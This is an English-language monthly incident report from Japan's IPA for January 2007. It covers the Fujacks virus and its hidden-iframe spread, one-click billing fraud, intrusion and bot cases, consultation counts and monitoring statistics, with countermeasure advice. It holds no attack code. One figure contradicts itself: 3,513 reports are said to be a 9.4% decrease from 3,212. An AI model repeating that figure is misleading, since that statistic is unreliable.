| This is a summary of
computer virus/unauthorized computer access incident reports for
January, 2007 compiled by IPA.
Reminder for the Month:
“Be
Sure not to Forget to Update!”
-
Update your Windows and Anti-virus Software Routinely! -
W32/Fujacks
is the virus exploiting security holes in Windows to infect those
computers whose users do not conduct Windows Update. From December
2006 to January 2007, number of its consultation and the reports
are filed with IPA from individual users.
Overview of the
Virus:
If a user leaves to resolve
the security holes in one Windows function used by the software
upon accessing to database, W32/Fujacks automatically
infects when the user browses the web contents being infected by
the virus. Be sure to conduct Windows Update constantly to prevent
infection accordingly.
When infected by the virus,
you will face such damages, i.e., your private information is stolen
by spyware being embedded or important files are deleted, etc. Some
of W32/Fujacks variants convert icons of infected
files that have “.exe” extensions into a picture of panda
burning joss-sticks are reported (refer to the Chart 1 below.).
Chart
1: Sample of Icons being Infected by the Variants of W32/Fujacks
Those files that have
“.exe”, “.thm”, “.php”, “.asp”
and “.jsp” as their extensions are the targeted files for
infection. Since these files are mainly used upon creating homepages,
there may be a case to publicize infected files on the website.
As the result, such infected files are publicized on the sites for
renowned businesses and/or on the sites for individual users. There
were some reports being infected when simply accessed to that site.
Most of all traditional
viruses infect via e-mails; in contrary, this virus infects via
e-mails as well as via websites as its paths; users need to be further
cautious since “ it is risky to get infected simply browsing
typical websites ”.
The Instances
of Enlarging Infection:
When W32/Fujacks
runs, it infects to those files that have “.exe”,
“.htm”, “.asp”, “.php” and “.jsp”,
etc. as their extensions in that computer. The virus can conduct
dictionary attack as well: it analyzes password and infects to the
files if easy password such as “admin” or “1234”
is used as the administrator password in the other computer connected
via the network with or in the file folders being shared.
When W32/Fujacks
infects, it appends IFrame* code on HTML files
(refer to the Chart 2.). In the “width=0 height=0” code,
the virus sets size 0 x 0 frame, there will be nothing displayed
specifically when browsing website. In addition, the URL being coded
will be the links to the sites to have downloads the virus.
Accordingly, those who
create homepages in corporation or individual update their homepages,
etc. without realizing virus infection; HTML contents files being
infected will be publicized as its result.
In the event, when a user
accesses to the homepage, the user will face damage. The virus attempts
the user accessing to the sites designated by the IFrame*
tags without realizing and downloads the files, etc. being infected
by the virus in that sites.
Those who create homepages
should confirm with or without of unknown IFrame tags at the end
of the HTML source before publicizing web contents.
IFrame* (Inline
Frame): One of HTML tags which creates an inline frame that contains
another document.
*IFrame (Inline
Frame): One of HTML tags which creates an inline frame that contains
another document.
Chart
2: Exsample of HTML File Infected
To prevent from such damages
or to prevent enlarging infection by the virus, be sure to conduct
following countermeasures:
Countermeasures:
- Resolve
security holes (or updating OSs and applications)
- Conduct
virus scan regularly while updating the virus signatures of anti-virus
software
- Do not open
the attachment file to suspicious e-mail
- Check HTML
source before updating web contents
Information relevant
to anti-virus measures:
Information for anti-virus
software (in Japanese)
http://www.ipa.go.jp/security/antivirus/vacc-info.html
Five must-dos for dealing
with files attached to email (in Japanese)
http://www.ipa.go.jp/security/antivirus/attach5.html
Seven anti-virus requirements
for computer users (in Japanese)
http://www.ipa.go.jp/security/antivirus/7kajonew.html
Information relevant to
resolving method for security holes (in Japanese)
“Procedure for the Usage
of Windows Update (Microsoft)”
http://www.microsoft.com/japan/athome/security/square/guard/WU5Steps.mspx
I.
Reporting Status for Computer Virus
– further details, please refer to the
Attachment 1
–
The detection number [1]
of virus for January was about 1.02M and was
decreased 22.2% from 1.31M reported in December. In addition, the
reported number [2] of virus
was about 3,513
and was decreased 9.4% from 3,212 reported in December.
| [1]Detection
number: |
Reported
virus counts (cumulative) found by a filer. |
[2]Reported
number: |
Virus counts are
aggregated: viruses of same type and variants reported on
the same day are counted as one case number regardless how
many viruses or the actual number of viruses is found by the
same filer on the same day. In December, reported number was
3,212: aggregated virus detection number was about 1.31M.
|
The worst detection number
was for W32/Netsky with about 0.62M, W32/Nuwar with about
0.14M and W32/Stration with about 0.09M were subsequently followed
.
Chart
1-1
Chart
1-2
II.
One-click Billing Fraud
The number of consultation
about “one-click billing fraud” for January 2007 was 233
: the number was drastically increased from 155 and 130
being reported in November and December respectively.
The main cause taking
over for 2006 was the damages by clicking at adult sites; however
in January 2007, it was converted to those sites for the information
relevant to entertainers' sites where inducing user suspicious sites
.
Among consultation instances
accepted by IPA, of some were being filed with the damage caused
by one-click billing fraud while a user searching certain entertainer's
animated movies or images. You are to be cautious as there
is some risk facing billing fraud even you do not intend to browse
adult sites.
Most of damages were caused
by downloading malicious codes such as virus, etc.: Upon clicking
the items relevant to membership registration in an entertainer's
site, the user will be sent to an adult site without knowing and
where the user simply clicks images or animated movies believing
that they are free; then virus, etc. will automatically be downloaded.
If you simply wish to
display movies or images, “Security Alert” won't be displayed,
but download program files. Accordingly, it is possible to download
malicious codes by clicking “Run” or “Save” unless
you attempt to download programs intentionally, be sure to click
“Cancel” and do not go forward.
Please feel free to consult
with IPA if you faced damage from malicious codes, etc. (please
refer to the IV. Accepting Status of Consultation on p8.)
III.
Reporting Status for Unauthorized Computer
Access (includes Consultations) –
Please refer to the Attachment 2 –
Report for unauthorized
computer access and status of consultation
|
Aug. |
Sept. |
Oct. |
Nov. |
Dec. |
Jan.'07 |
Total
for Reported (a) |
50 |
46 |
22 |
24 |
10 |
32 |
| |
Damaged
(b) |
30 |
21 |
15 |
8 |
9 |
22 |
Not
Damaged (c) |
20 |
25 |
7 |
16 |
1 |
10 |
Total
for Consultation (d) |
24 |
35 |
53 |
30 |
40 |
52 |
| |
Damaged
(e) |
13 |
26 |
37 |
20 |
23 |
25 |
Not
Damaged (f) |
11 |
9 |
16 |
10 |
17 |
27 |
Grand
Total (a + d) |
74 |
81 |
75 |
54 |
50 |
84 |
| |
Damaged
(b + e) |
43 |
47 |
52 |
28 |
32 |
47 |
Not
Damaged (c + f) |
31 |
34 |
23 |
26 |
18 |
37 |
(1). Reporting
Status of Unauthorized Computer Access
Reported number
for January was 32: of 22
was the number actually damaged.
(2). Accepting Status
of Consultations relevant to Unauthorized Computer Access, etc.
Consultation counts relevant
to unauthorized computer access was 52: of 25 (of 3 was also counted
as reported number) was the actual number that some sort of damage
was reported.
(3). Status for Damage
Breakdown of the damage
report includes: Intrusion with 1, Source Address Spoofing
with 2 and others (damaged) with 19 .
Breakdown of the reported damages caused by intrusion included:
alteration of files with 1. The cause of intrusion was being exploited
vulnerability in web server software.
Damage
Instances:
[Intrusion]
(i) Attack
of Homepage
<Instance>
- This business's
site might have been altered so communicated from a user who browsed
the site.
- Study by
a homepage manager was conducted: it is realized that some very
political or religious contents that they do not know had been placed
on a program folder in the website run using a hosting service (*1).
- Since any
suspicious contents on the access log of ftp could not be found,
it may have been intruded by exploiting the vulnerability in the
web server software.
[Others (Damaged)]
(ii) Damage
by Bot
<Instance>
- Suspicious
IRC (*2) communication
and/or port scans to 445/tcp in the network on campus were detected.
- Study by
the network administrator was conducted, it was realized that several
computers on the campus were infected by bot.
IV.
Accepting Status of Consultation
The gross number for the
consultation for January was 946 . Of the consultation
relevant to “ One-click Billing Fraud ”
was 233 (December:
130), the consultation relevant to “ High-pressured selling
of software for security measures ” with 13
(December: 15) and the consultation relevant to
“ Winny ” with 17
(December: 15), etc.
Movement in entire number
of consultation accepted by IPA
|
August |
Sept. |
Oct. |
Nov. |
Dec. |
Jan.
'07 |
Total
|
793 |
933 |
1,002 |
711 |
680 |
946 |
| |
Automatic
Response System |
460 |
575 |
580 |
423 |
394 |
582 |
Telephone
|
280 |
302 |
326 |
214 |
222 |
324 |
e-mail
|
48 |
51 |
93 |
72 |
59 |
39 |
Fax,
Others |
5 |
5 |
3 |
2 |
5 |
1 |
*IPA consults/advises
for computer viruses/unauthorized computer accesses as well as the
other information concerning overall security issues
Mail: 
for virus issues,  for
crack issues.
Tel.: +81-3-5978-7509
(24-hour automatic response)
Fax: +81-3-5978-7518
(24-hour automatic response)
*The Total case number
includes the number in Consultation (d) column of the Chart in the
“III. Reported Status for Unauthorized Computer Access”
and “IV. Accepting Status of Consultation”.
*”Automatic Response
System”: Accepted numbers by automatic response
*“Telephone”:
Accepted numbers by the Security Center personnel
<Reference>
Shift in the consultation number of one-click billing fraud
Please refer to the following
link for the measures for one-click billing fraud.
Reminder for the month
(for the month of January) “Malicious Codes may be Installed
if you Ignore Alert!!”
http://www.ipa.go.jp/security/english/virus/press/200601/E_PR200601.html
Reporting Status of Computer
Virus and Unauthorized Computer Access for September and the 3 rd
Quarter
2. One-click Billing Fraud
http://www.ipa.go.jp/security/english/virus/press/200609/E_PR200609.html
Reporting Status of Computer
Virus and Unauthorized Computer Access for August
2. Consultation Number for
the Damages by One-click Billing Fraud is Unchangeably Many!!
http://www.ipa.go.jp/security/english/virus/press/200608/E_PR200608.html
<Reference>
Shift in the consultation number for High-Pressured Selling of Security
Software
As for the activities of
high-pressured selling of security software, please also refer to
the following link.
Reminder for the month
(for the month of April)
“Be Cautious with the
High-pressured Selling Activities of Software for Security Measures!!”
http://www.ipa.go.jp/security/english/virus/press/200604/E_PR200604.html
The major consultations
for the month are as follows.
(i)
Deceived by the mail masquerading to
be the Internet settling service?!
Consultation:
Conducted remittance activity
electronically via the Internet settling service and received the
mail informing that the remittance was successfully done. However,
again, I was urged to do so via another mail. Then I inquired to
the settling service and realized that they'd not mailed me other
than the mail informing that the remittance was done. The mail urging
me to input private information seemed to be a fake one.
Response:
It seems that this
user faced a phishing (*3)
fraud. It is effective to change mail address and/or credit
card numbers to prevent subsequent damages. In
case private information is illegally used, it is possible that
the purchasing history of the products that the legitimate user
does not know will be included in his/her credit card billing statement.
When facing such troubles, be sure to communicate with the credit
card company where the user is dealing with. It is also good to
consult with the consumer center near his/her area.
<Reference>
National Consumer Affairs
Center of Japan
http://www.kokusen.go.jp/map/
(ii) About
Security Countermeasures
Consultation:
Implementing certain security
software is enough to fight against viruses and spyware? Are there
any other measures?
Response:
Although anti-virus and/or
anti-spyware measures software are implemented, it still remains
some risks that they may not detect unknown unauthorized programs
so they are not totally safe. As for the other preventive means,
following MUST DOs can be considered.
-Maintain all
the programs you are using up-to-dated.
-Do not open
the files for which source is not identifiable.
-Do not browse
suspicious sites.
-Disable the
function of each script at a web browser.
In addition, implementing
software such as personal firewall, etc. where configuring in which
legitimacy on those programs identified can only connect to the
Internet: this ensures to prevent important/private information
deviation in case unauthorized program is being embedded.
<Reference>
Ministry of Economy, Trade
and Industry – CHECK PC! Campaign (by March 31, 2007) (in Japanese)
http://www.checkpc.go.jp/
IPA – Security Alert Towards
the Damage Prevention by Spyware (in Japanese)
http://www.ipa.go.jp/security/topics/170720_spyware.html
V.
Accessing Status Captured by the Internet Monitoring (TALOT2”)
in January
According to the Internet
Monitoring (TALOT2), the total of unwanted (one-sided) number of
access in January 2007 was 492,760 for 10 monitoring
points. That is, the number of access was 1,590
from 390 source addresses/monitoring point/day.
Each monitoring environment
for the TALOT2 is nearly equal to the general connection environment
used for the Internet; it can be considered that the same amount
of unwanted (one-sided) access can be monitored for the general
Internet users' connection environment. In another word, your
computer is being accessed from 390 unknown source addresses in
average/day or you are being accessed from 4 times from one source
address which considered unauthorized.
Chart
5.1: Unwanted (One-sided) Number of Access and Source Number of
Access/Monitoring Point/Day
The Chart 5.1 shows the
number of access and the source number of access/monitoring point/day
in average from August 2006 to January 2007. According to this
chart, the unwanted (one-sided) accesses are slightly increased
compared with December. Such tendencies are caused by the access
increases of Ping (ICMP* ) and newer vulnerabilities in
a computer being targeted.
The entire access contents
are being stabled: it can be considered that the most of accesses
are the infection activity of bot (such accesses attempt to enlarge
bot infection targeting vulnerability in computers) from the computers
being infected by bot.
The accessing status
in January 2007 is almost the same with the one in December 2006
entirely: the access increase of Ping (ICMP) and such accesses
targeting vulnerabilities in Symantec Client Security and Symantec
AntiVirus (such accesses to the port 2967/tcp) are continually
increasing as it is previously described.
* Internet Control
Message Protocol: such protocol which checks if the other side
of computers are being operated or not.
Since the TALOT2 monitors
accesses over the Internet one-sidedly, it does not respond to
the access of Ping (ICMP). Accordingly, the TALOT2 cannot monitor
the following accesses in case responded to Ping (ICMP); they
can be considered such accesses which check whether the computers
being targeted for attacks are in operation.
Chart
5.2: Ping (ICMP) Accesses
The Chart 5.2 shows
the shift in the number of access classified by the source area
of Ping (ICMP), the Ping (ICMP) access increase from China area
is remarkable. As for the accesses from the other source areas,
they are being maintained at a certain water levels (with subtle
increase).
For the additional information,
please refer to the following site.
Attachment 3_Observation
Status Captured by the Internet Monitoring (TALOT2)
http://www.ipa.go.jp/security/english/virus/press/200701/TALOT200701.html
“Various
Statistics Information Provided by Other Organizations/Vendors
are Publicized in the Following Sites”
@police: http://www.cyberpolice.go.jp/english/
Trendmicro: http://www.trendmicro.com/en/home/us/home.htm
McAfee: http://www.mcafee.com/us/
“Interpretation for Glossaries”
(*1)
Hosting Service
:
The business which rents
a client disk capacity within a web server partially for which
is being connected to the Internet and publicized. It can also
be referred as rental server.
(*2)
IRC (Internet Relay Chat)
:
A chat (a real time conversation
in between the users connecting to the Internet) system. Upon
accessing to the IRC server on the Internet using exclusive software,
a user can exchange messages among multiple users via the system.
Users can also exchange files via the system.
(*3)
Phishing
:
Spoofing or masquerading
to be the mail or the web pages of existed businesses illegally
such as banking, etc. to exploit legitimate user IDs and passwords
who previously opened or browsed such mails or web pages. “Fishing”
is the word origin of “phishing”, but there are several
theories such as “f” was exchanged by “ph”
according to hackers' naming convention, coined word for which
origins were “sophisticated” and “fish” or shortened
word form of “password harvesting fishing”, etc.
The details are as follows:
- Attachment 1 Computer
virus Incident Report [Details]
- Attachment
2 Unauthorized Computer Access Incident Report [Details]
- Attachment
3 Observation Status by Internet Monitoring System (TALOT2) |
Japanese